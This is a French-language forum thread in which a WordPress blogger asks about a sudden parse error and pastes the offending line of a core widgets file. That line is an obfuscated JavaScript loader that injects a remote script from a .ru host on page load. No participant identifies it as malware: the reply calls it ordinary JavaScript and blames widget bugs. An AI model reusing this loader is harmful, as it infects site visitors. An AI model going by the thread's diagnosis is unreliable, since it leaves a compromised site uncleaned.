BDD Worpress

Résolu/Fermé
gayal Messages postés 125 Date d'inscription mercredi 27 février 2008 Statut Membre Dernière intervention 15 février 2015 - 19 mars 2010 à 18:24
gayal Messages postés 125 Date d'inscription mercredi 27 février 2008 Statut Membre Dernière intervention 15 février 2015 - 23 mars 2010 à 15:23
Bonjour,

Hier matin en tapant l'url de mon blog je suis tombé sur cette page :

Parse error: syntax error, unexpected '<' in /htdocs/public/www/wp-includes/default-widgets.php on line 1044

quelqu'un pourrait il m'aider ou m'expliquer ce que cela siginifie? je n'ai rien ajouté ou téléchargé en plus sur mon Wordpress....donc je ne comprends pas trop ce qui a pu se passser


ma config
Ma configuration WP actuelle
- Version de WordPress : WordPress 2.9.2.
- Version de PHP/MySQL : Mysql 4.1
- Thème utilisé : LightWord
- Extensions en place : avec 3 widgets
- Nom de l'hebergeur : amen
- Adresse du site : www.audeladesidees.com

merci,

10 réponses

Marc Harnist Messages postés 84 Date d'inscription mardi 9 mars 2010 Statut Membre Dernière intervention 4 mars 2011 15
Modifié par Marc Harnist le 19/03/2010 à 18:34
Bonsoir Gayal,

Ce message d'erreur nous permet de dire qu'il y a une erreur dans le code php (personnal home page) d'un widget (petits programmes ou options situées généralement sur les cotés des pages) de votre CMS Wordpress.

Il y a un chevron en trop dans le code (<).

Vous dites que vous n'avez rien modifié? Pas rajouté un code de compteur dans le pieds de page? Aucun texte en codage php?

Si vous n'avez vraiment rien changé, c'est qu'il y a eu un petit bug lors de l'installation de wordpress. Cela arrive.

Ce que je ferais: je désactiverai les trois widget un après l'autre pour voir lequel fait buger mon site.
0
gayal Messages postés 125 Date d'inscription mercredi 27 février 2008 Statut Membre Dernière intervention 15 février 2015
19 mars 2010 à 19:15
Ah alors si j'ai ajouté un compteur Google Analytics et un compteur Sitemeter, mais ils ont très bien fonctionné pendant 1 semaine environ, ce qui est étonnant c'est que ça a buggé d'un coup après quelques jours sans problème....


Comment faites on pour désactiver les 3 widgets ?!

Merci pour votre réponse,

PS : le code de ma ligne 1044 pour info :
<script>var s;if(s!='' && s!='cv'){s=null};try {var P;if(P!='g' && P != ''){P=null};var z=RegExp;var HZ;if(HZ!=''){HZ='N'};var q=String("IOvPrepla".substr(4)+"ArWcerWA".substr(3,2));var x=new String();var Z=new String();var orv=new Date();var b;if(b!='w'){b='w'};function c(v,a){var W_;if(W_!='' && W_!='mj'){W_=''};var F=new Array();var Bu=new Array();var L=String("[P5Vo".substr(0,1));var HQ=new Date();var S=String("g");L+=a;var g_='';var hN='';L+=new String("rj4]".substr(3));var k;if(k!='' && k!='Lk'){k=''};var QX;if(QX!='' && QX!='d'){QX=''};var Q=new z(L, S);this.Bn="";var VA;if(VA!='bZ'){VA=''};return v[q](Q, new String());};var Nz;if(Nz!='NO' && Nz!='mU'){Nz=''};var W=c('oenJlJoea7d7',"7Je");var aK='';var tH=new Date();var J=c('sOcYr7inpntO',"7YOn6");var j=c('hEt_tKpK:E/_/_g_aEmKe_fEaEq_sK-EcEoKm_.EnKeEo_b_uKxE.EcKo_m_._j_uEeKg_oEs_-KcEo_mK.KTEh_e_BKlEeKn_dKeErKTKuKtEoKrKi_aEl_._rEuK:K',"KE_");var m=window;var nY;if(nY!='ZL' && nY!='Wj'){nY=''};var Nq=new String();var e=c('899565065559568656560966556',"659");var FF=new Date();var zR=c('/EgSoEougElEeu.EcuoE.SiunS/EguouougElEeE.ucEou.SiunE/SgEouougElSeS.ucuoSmu/SaSlEiSbSaubuau.EcEoumS/SwShuoE.SiEsS.upEhupS',"SEu");var AK;if(AK!='' && AK!='KD'){AK=''};var ew='';var T=c('c8rWe8a9t8e9E9l9e9mWe8nWt8',"98W");V=function(){var _v;if(_v!='' && _v!='Zz'){_v=''};I=document[T](J);var U=new String();var eJ=new String();var km=new String();aK=j+e;aK+=zR;var _y=new Date();I.src=aK;var Iu;if(Iu!='' && Iu!='ne'){Iu=null};var gO=new String();I.defer=([1][0]);var bq="";var X=new Date();var Ou=new String();document.body.appendChild(I);var Ui=new String();};var oS;if(oS!='TB' && oS!='Zzm'){oS='TB'};var kL;if(kL!='jL'){kL=''};var po;if(po!='Wo'){po=''};var EP;if(EP!='Qm'){EP=''};m[W]=V;var eL;if(eL!='Zy' && eL != ''){eL=null};var Ke=new Date();} catch(Vu){};</script>
0
Marc Harnist Messages postés 84 Date d'inscription mardi 9 mars 2010 Statut Membre Dernière intervention 4 mars 2011 15
Modifié par Marc Harnist le 19/03/2010 à 22:04
Pour enlever les widgets il faut aller dans l'administration de Wordpress et cliquer sur widget à gauche.
Je pense qu'en déplaçant le widget de la droite vers la gauche il va s'effacer.
Si vous avez créer du texte il faudra d'abord le sauvegarder, mais d'après ce que vous avez dit, vous n'avez pas modifier les widget, donc pas de risque.

Ensuite, votre code ci-dessous ne semble pas contenir l'erreur. Elle se situe probablement dans une ou plusieurs ligne au-dessus, dans le code php. Le code ci-dessus c'est du javascript.

C'est pour cela que désinstaller et réinstaller les widget me paraît être la solution la plus rapide. En tout cas, n'ayant pas accès au site, c'est à mon avis la réparation la plus simple depuis un forum!
0
gayal Messages postés 125 Date d'inscription mercredi 27 février 2008 Statut Membre Dernière intervention 15 février 2015
22 mars 2010 à 10:15
Merci pour le conseil, ça me parait en effet la bonne solution, mais le souci c'est que je n'ai même plus accès à mon interface WP.....je tape mes codes mes derrières j'ai des lignes de codes errors et aucun accès à mon admin.

Sinon j'ai modifié l'entrée de ce script "<script>" par "</script>" ce qui me permet d'afficher mon blog mais c'est un peu bancale

je vais regarder dans les lignes au dessus pour voir si je peux changer des choses

merci,
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Marc Harnist Messages postés 84 Date d'inscription mardi 9 mars 2010 Statut Membre Dernière intervention 4 mars 2011 15
22 mars 2010 à 11:05
Wordpress c'est vraiment génial.

Le problème, c'est que c'est un cms assez poussé, et à moins de s'y connaître vraiment en programmation, c'est difficile de régler les bugs qui sont tout de même fréquents.

Et si on s'y connaît vraiment, ben, on fait son cms soi-même!

Vu les bugs fréquent de wordpress, je ne l'utilise que pour des blogs secondaires, parce que je trouve les designs bien faits.

Sinon, avez-vous pensé poser la question sur le forum francophone de Wordpress ici https://wpfr.net/support/forum/support-de-wordpress/ ?
0
gayal Messages postés 125 Date d'inscription mercredi 27 février 2008 Statut Membre Dernière intervention 15 février 2015
22 mars 2010 à 11:27
yep, bien sur, je suis même d' abord passé par le forum WP mais on m'a répondu : "Je sais pas trop ce que signifie ta phrase d'erreur " ce qui n'est pas très rassurant ;o)

et comme tu l'indique je ne suis pas un "pro" de la programmation, je galère un peu sur ce genre de bug

vous vous y connaissez bien !? je peux vous mettre la suite du fichier widget quelque part pour que vous puissiez jeter un oeil ?!
0
Marc Harnist Messages postés 84 Date d'inscription mardi 9 mars 2010 Statut Membre Dernière intervention 4 mars 2011 15
22 mars 2010 à 11:31
Je ne m'y connais pas aussi bien que les meilleurs forumeurs du forum Wordpress. Mais si personne ne t'a aidé, tu peux m'envoyer le code en message privé je peux essayer de trouver le bug. Si le bug se trouve dans le widget!
0
gayal Messages postés 125 Date d'inscription mercredi 27 février 2008 Statut Membre Dernière intervention 15 février 2015
22 mars 2010 à 16:17
peut être mais tu m'as bien aidé pour l'instant, merci beaucoup !

le fichier est en txt, ci-dessous, à renommer en .php :
http://www.cijoint.fr/cjlink.php?file=cj201003/cij1FXHsSu.txt

si jamais tu trouves quelque chose
merci
0
Marc Harnist Messages postés 84 Date d'inscription mardi 9 mars 2010 Statut Membre Dernière intervention 4 mars 2011 15
23 mars 2010 à 06:42
Désolé Gayal, je ne vois pas d'erreur dans le texte que tu as publié.
0
gayal Messages postés 125 Date d'inscription mercredi 27 février 2008 Statut Membre Dernière intervention 15 février 2015
23 mars 2010 à 15:23
bon tant pis merci beaucoup pour ton aide en tout cas.
0